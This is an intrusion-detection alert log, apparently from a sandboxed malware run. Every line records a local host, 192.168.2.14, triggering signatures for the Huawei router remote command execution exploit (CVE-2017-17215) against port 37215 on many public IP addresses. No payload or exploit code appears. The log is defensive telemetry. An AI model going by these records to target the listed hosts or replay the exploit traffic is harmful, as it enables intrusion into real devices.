                                                    07/10/24-08:26:45.633431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913837215192.168.2.14157.131.165.165
                                                    07/10/24-08:26:49.768193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958637215192.168.2.1441.167.198.208
                                                    07/10/24-08:27:05.165980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275637215192.168.2.1447.198.146.100
                                                    07/10/24-08:26:26.579730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433437215192.168.2.14174.146.80.189
                                                    07/10/24-08:26:20.168478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379637215192.168.2.14157.16.175.58
                                                    07/10/24-08:27:08.374811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840837215192.168.2.14197.247.23.45
                                                    07/10/24-08:27:08.435452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5951837215192.168.2.1441.222.87.243
                                                    07/10/24-08:26:43.780155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707237215192.168.2.14197.246.42.64
                                                    07/10/24-08:26:45.676177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351037215192.168.2.1441.163.109.233
                                                    07/10/24-08:26:29.755457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5447837215192.168.2.14197.117.31.156
                                                    07/10/24-08:27:05.209261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995837215192.168.2.14157.255.88.31
                                                    07/10/24-08:26:28.897844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415437215192.168.2.14183.233.235.178
                                                    07/10/24-08:26:29.785606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316237215192.168.2.14157.228.245.198
                                                    07/10/24-08:26:55.408073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654237215192.168.2.14197.139.125.65
                                                    07/10/24-08:26:17.949635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268437215192.168.2.1441.29.180.95
                                                    07/10/24-08:26:36.314456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440637215192.168.2.1441.115.241.128
                                                    07/10/24-08:26:41.405214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249437215192.168.2.14157.235.164.188
                                                    07/10/24-08:27:22.564471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363237215192.168.2.1441.52.197.206
                                                    07/10/24-08:26:22.228367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011637215192.168.2.1441.171.165.206
                                                    07/10/24-08:26:36.358827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251037215192.168.2.1443.151.163.210
                                                    07/10/24-08:27:08.357813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032237215192.168.2.14157.96.163.96
                                                    07/10/24-08:26:11.506758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165237215192.168.2.1441.211.47.10
                                                    07/10/24-08:26:59.701757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659237215192.168.2.14197.186.25.243
                                                    07/10/24-08:27:19.284664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984037215192.168.2.1441.127.220.228
                                                    07/10/24-08:26:47.931064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344237215192.168.2.1441.39.250.70
                                                    07/10/24-08:26:38.611968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714637215192.168.2.1441.67.193.119
                                                    07/10/24-08:26:49.824955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5596437215192.168.2.14137.193.17.107
                                                    07/10/24-08:26:17.994828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103637215192.168.2.14197.9.101.252
                                                    07/10/24-08:26:33.240926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737837215192.168.2.14157.46.3.218
                                                    07/10/24-08:27:24.837917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744437215192.168.2.1441.157.83.86
                                                    07/10/24-08:26:34.210999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416037215192.168.2.14197.199.40.29
                                                    07/10/24-08:27:32.558731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411637215192.168.2.1452.115.48.195
                                                    07/10/24-08:26:17.972432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825037215192.168.2.14197.39.0.105
                                                    07/10/24-08:26:25.481265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625037215192.168.2.14138.66.98.209
                                                    07/10/24-08:27:22.903866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961837215192.168.2.1466.31.61.161
                                                    07/10/24-08:26:18.021892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190237215192.168.2.14197.9.13.76
                                                    07/10/24-08:26:47.996062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130437215192.168.2.14157.210.180.197
                                                    07/10/24-08:27:22.871657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295237215192.168.2.1441.106.156.208
                                                    07/10/24-08:26:11.605527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862237215192.168.2.14197.202.24.221
                                                    07/10/24-08:26:59.667281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599637215192.168.2.14197.118.46.44
                                                    07/10/24-08:27:24.981965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5760037215192.168.2.14137.118.209.240
                                                    07/10/24-08:26:49.787588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547237215192.168.2.14157.60.81.108
                                                    07/10/24-08:27:20.445959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524237215192.168.2.1441.244.12.131
                                                    07/10/24-08:26:49.911727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379037215192.168.2.14157.42.142.224
                                                    07/10/24-08:26:59.771792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681437215192.168.2.14157.157.132.87
                                                    07/10/24-08:26:33.206417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4455437215192.168.2.14157.120.144.224
                                                    07/10/24-08:27:07.366648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672237215192.168.2.14197.54.223.95
                                                    07/10/24-08:27:31.483215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897637215192.168.2.1441.45.148.22
                                                    07/10/24-08:26:11.105153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777437215192.168.2.1441.174.151.32
                                                    07/10/24-08:27:31.550771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704437215192.168.2.1484.214.204.35
                                                    07/10/24-08:27:19.199825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519037215192.168.2.14157.20.195.179
                                                    07/10/24-08:26:11.622181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854837215192.168.2.1441.209.20.252
                                                    07/10/24-08:27:07.384932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327637215192.168.2.14213.3.183.31
                                                    07/10/24-08:26:25.487811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842837215192.168.2.14208.91.65.199
                                                    07/10/24-08:26:57.658066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674837215192.168.2.1413.140.80.105
                                                    07/10/24-08:27:02.857576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957437215192.168.2.14157.10.84.58
                                                    07/10/24-08:26:28.763475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815037215192.168.2.14157.213.189.96
                                                    07/10/24-08:27:05.135511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902637215192.168.2.14157.74.116.34
                                                    07/10/24-08:26:57.655125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411037215192.168.2.14197.25.5.206
                                                    07/10/24-08:27:11.533117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301637215192.168.2.14157.74.82.10
                                                    07/10/24-08:26:55.379647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939037215192.168.2.1441.19.17.17
                                                    07/10/24-08:26:57.663651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863237215192.168.2.14157.119.49.76
                                                    07/10/24-08:26:17.981659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492237215192.168.2.14157.174.59.43
                                                    07/10/24-08:26:38.535955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798237215192.168.2.1441.246.144.212
                                                    07/10/24-08:26:59.649070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612037215192.168.2.1423.101.220.177
                                                    07/10/24-08:27:14.851521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613237215192.168.2.1441.190.233.105
                                                    07/10/24-08:26:47.895681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274237215192.168.2.14157.61.247.78
                                                    07/10/24-08:26:17.972385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4460637215192.168.2.1480.141.182.205
                                                    07/10/24-08:26:31.076379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697037215192.168.2.1441.112.110.98
                                                    07/10/24-08:27:23.453618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862237215192.168.2.14109.249.226.119
                                                    07/10/24-08:26:13.828285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639237215192.168.2.14157.6.170.133
                                                    07/10/24-08:26:34.256446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846437215192.168.2.14197.215.86.243
                                                    07/10/24-08:26:48.030999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4366237215192.168.2.14197.128.48.152
                                                    07/10/24-08:26:49.849524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847437215192.168.2.14197.218.215.212
                                                    07/10/24-08:26:47.835000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540637215192.168.2.1441.52.173.16
                                                    07/10/24-08:26:47.953333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817637215192.168.2.1441.70.79.158
                                                    07/10/24-08:27:22.532375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999437215192.168.2.1441.98.201.231
                                                    07/10/24-08:26:28.651125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4673237215192.168.2.14157.91.133.43
                                                    07/10/24-08:27:05.240759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445037215192.168.2.1441.40.118.150
                                                    07/10/24-08:27:14.900455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803037215192.168.2.14197.30.93.5
                                                    07/10/24-08:27:20.414993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895037215192.168.2.1441.26.60.237
                                                    07/10/24-08:27:30.411033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679837215192.168.2.1441.216.83.167
                                                    07/10/24-08:26:13.819532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965637215192.168.2.1441.121.235.201
                                                    07/10/24-08:26:23.354266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370437215192.168.2.1441.52.216.117
                                                    07/10/24-08:26:11.466916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626637215192.168.2.14157.10.89.64
                                                    07/10/24-08:26:47.930941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541637215192.168.2.1441.93.76.124
                                                    07/10/24-08:27:30.416774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743437215192.168.2.14197.27.205.11
                                                    07/10/24-08:26:22.281648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800037215192.168.2.14157.69.139.102
                                                    07/10/24-08:26:28.846857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5402837215192.168.2.14157.190.100.14
                                                    07/10/24-08:27:02.716431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889637215192.168.2.1441.102.246.217
                                                    07/10/24-08:27:30.435310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011237215192.168.2.1441.35.177.153
                                                    07/10/24-08:27:24.985938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064437215192.168.2.14157.92.59.231
                                                    07/10/24-08:26:29.882754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038437215192.168.2.1441.151.176.103
                                                    07/10/24-08:27:10.739148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4305237215192.168.2.14197.220.36.165
                                                    07/10/24-08:27:20.453874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3378637215192.168.2.14157.242.90.255
                                                    07/10/24-08:27:20.498164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984637215192.168.2.1441.230.143.238
                                                    07/10/24-08:26:14.622674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737037215192.168.2.14157.35.232.144
                                                    07/10/24-08:27:28.176057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935237215192.168.2.1499.129.68.51
                                                    07/10/24-08:26:14.821697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472037215192.168.2.14157.27.101.81
                                                    07/10/24-08:26:36.339944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070037215192.168.2.14157.204.9.235
                                                    07/10/24-08:27:33.942664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506437215192.168.2.14197.53.91.127
                                                    07/10/24-08:26:25.474823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495037215192.168.2.14197.41.209.1
                                                    07/10/24-08:27:22.933807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171037215192.168.2.1441.106.241.27
                                                    07/10/24-08:26:59.554660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864637215192.168.2.1434.197.197.47
                                                    07/10/24-08:27:23.959753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331037215192.168.2.14172.88.141.46
                                                    07/10/24-08:26:57.677011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405037215192.168.2.14157.137.194.141
                                                    07/10/24-08:27:02.830604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775437215192.168.2.14197.104.152.42
                                                    07/10/24-08:27:08.364400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979237215192.168.2.14157.17.219.48
                                                    07/10/24-08:26:13.847228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507637215192.168.2.1441.78.50.179
                                                    07/10/24-08:26:28.927813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660237215192.168.2.14197.153.56.150
                                                    07/10/24-08:26:17.969551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174037215192.168.2.14197.98.163.179
                                                    07/10/24-08:26:34.244290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942037215192.168.2.1441.7.75.163
                                                    07/10/24-08:26:41.489365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704837215192.168.2.14125.193.57.212
                                                    07/10/24-08:26:42.366106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654237215192.168.2.14157.134.241.39
                                                    07/10/24-08:26:49.821091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032437215192.168.2.1441.165.201.178
                                                    07/10/24-08:27:23.854070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308437215192.168.2.1443.111.125.136
                                                    07/10/24-08:27:19.287568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835037215192.168.2.14157.95.141.107
                                                    07/10/24-08:27:22.781993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011637215192.168.2.14197.6.110.208
                                                    07/10/24-08:27:30.469878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578037215192.168.2.14157.119.16.83
                                                    07/10/24-08:26:57.625534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4180437215192.168.2.14197.139.156.45
                                                    07/10/24-08:27:24.988498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106237215192.168.2.14197.34.128.58
                                                    07/10/24-08:26:13.816955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407037215192.168.2.14197.153.14.104
                                                    07/10/24-08:27:27.122406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4548237215192.168.2.14197.55.214.164
                                                    07/10/24-08:27:17.070374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4844637215192.168.2.14197.141.103.167
                                                    07/10/24-08:26:17.971584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560637215192.168.2.14197.250.98.30
                                                    07/10/24-08:26:49.792621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412437215192.168.2.14157.34.93.211
                                                    07/10/24-08:26:52.012219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529637215192.168.2.1441.158.13.173
                                                    07/10/24-08:26:15.800070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527237215192.168.2.14197.13.170.178
                                                    07/10/24-08:26:34.254772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499237215192.168.2.1441.84.9.201
                                                    07/10/24-08:27:32.558731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964437215192.168.2.14197.0.46.86
                                                    07/10/24-08:26:17.941159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496437215192.168.2.14157.241.212.174
                                                    07/10/24-08:27:27.147329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783837215192.168.2.1441.95.27.83
                                                    07/10/24-08:27:13.905165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290637215192.168.2.14157.156.42.102
                                                    07/10/24-08:26:28.836881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616637215192.168.2.14123.76.51.216
                                                    07/10/24-08:26:23.284059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374237215192.168.2.14157.9.43.60
                                                    07/10/24-08:26:33.208753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060437215192.168.2.1441.216.167.96
                                                    07/10/24-08:27:14.850693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546437215192.168.2.14197.242.76.100
                                                    07/10/24-08:26:38.558999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.1450.157.226.199
                                                    07/10/24-08:26:28.633742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513837215192.168.2.1441.180.120.245
                                                    07/10/24-08:27:23.947908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418237215192.168.2.14197.219.221.172
                                                    07/10/24-08:26:42.412174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874437215192.168.2.14197.173.230.210
                                                    07/10/24-08:27:19.174843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935037215192.168.2.14197.134.189.254
                                                    07/10/24-08:26:25.492414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911637215192.168.2.1437.66.120.52
                                                    07/10/24-08:27:05.189042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164437215192.168.2.1441.98.201.188
                                                    07/10/24-08:26:11.115720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610837215192.168.2.14197.2.240.85
                                                    07/10/24-08:26:20.171305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846237215192.168.2.14116.218.226.69
                                                    07/10/24-08:26:26.585966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939837215192.168.2.14157.54.180.250
                                                    07/10/24-08:26:33.193965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703837215192.168.2.14157.61.60.241
                                                    07/10/24-08:27:31.448205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763637215192.168.2.14197.2.136.151
                                                    07/10/24-08:26:17.950473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668037215192.168.2.14157.176.77.178
                                                    07/10/24-08:27:11.529436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4633237215192.168.2.1432.75.247.250
                                                    07/10/24-08:26:25.420167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397037215192.168.2.14197.243.118.53
                                                    07/10/24-08:26:28.633742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489037215192.168.2.1441.195.4.75
                                                    07/10/24-08:26:20.137377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285837215192.168.2.14197.203.144.87
                                                    07/10/24-08:26:22.265342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686437215192.168.2.1441.192.234.211
                                                    07/10/24-08:26:36.362536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792437215192.168.2.14157.222.79.123
                                                    07/10/24-08:26:42.356515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751037215192.168.2.1445.247.152.31
                                                    07/10/24-08:27:20.424605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3916037215192.168.2.14156.36.227.220
                                                    07/10/24-08:27:16.979192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4879837215192.168.2.1463.167.185.175
                                                    07/10/24-08:26:49.813021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445637215192.168.2.14157.233.222.129
                                                    07/10/24-08:26:38.634694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697437215192.168.2.1441.213.6.174
                                                    07/10/24-08:27:08.386325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277237215192.168.2.1441.176.239.112
                                                    07/10/24-08:26:31.106288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035837215192.168.2.14157.100.48.246
                                                    07/10/24-08:27:27.159705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065037215192.168.2.14157.50.30.78
                                                    07/10/24-08:27:19.219162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887237215192.168.2.1419.230.14.38
                                                    07/10/24-08:27:02.692447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940437215192.168.2.14157.152.11.231
                                                    07/10/24-08:26:33.173734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854637215192.168.2.14197.222.63.19
                                                    07/10/24-08:26:49.865409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474037215192.168.2.1414.151.177.35
                                                    07/10/24-08:26:43.931140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427437215192.168.2.1441.217.218.133
                                                    07/10/24-08:27:05.158700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596237215192.168.2.1489.0.108.43
                                                    07/10/24-08:26:47.804395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966637215192.168.2.14157.117.231.251
                                                    07/10/24-08:26:55.433517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610437215192.168.2.1441.218.81.249
                                                    07/10/24-08:26:43.881879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471037215192.168.2.14157.46.9.65
                                                    07/10/24-08:26:47.766848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551037215192.168.2.14163.82.72.7
                                                    07/10/24-08:26:26.611798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745637215192.168.2.14157.34.116.52
                                                    07/10/24-08:26:14.804640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320437215192.168.2.1441.32.202.23
                                                    07/10/24-08:26:38.543702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947637215192.168.2.1441.171.6.132
                                                    07/10/24-08:27:07.270809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371037215192.168.2.14197.197.237.179
                                                    07/10/24-08:27:20.495859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958237215192.168.2.1435.102.220.132
                                                    07/10/24-08:27:24.860339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392837215192.168.2.1441.173.90.114
                                                    07/10/24-08:27:30.414315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285237215192.168.2.14157.66.83.75
                                                    07/10/24-08:26:15.880564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879437215192.168.2.1441.74.115.8
                                                    07/10/24-08:27:13.867398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512837215192.168.2.1441.133.35.248
                                                    07/10/24-08:26:14.721683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781037215192.168.2.14157.173.63.20
                                                    07/10/24-08:26:33.217883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894437215192.168.2.1451.31.124.134
                                                    07/10/24-08:26:57.680054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602237215192.168.2.14157.7.4.219
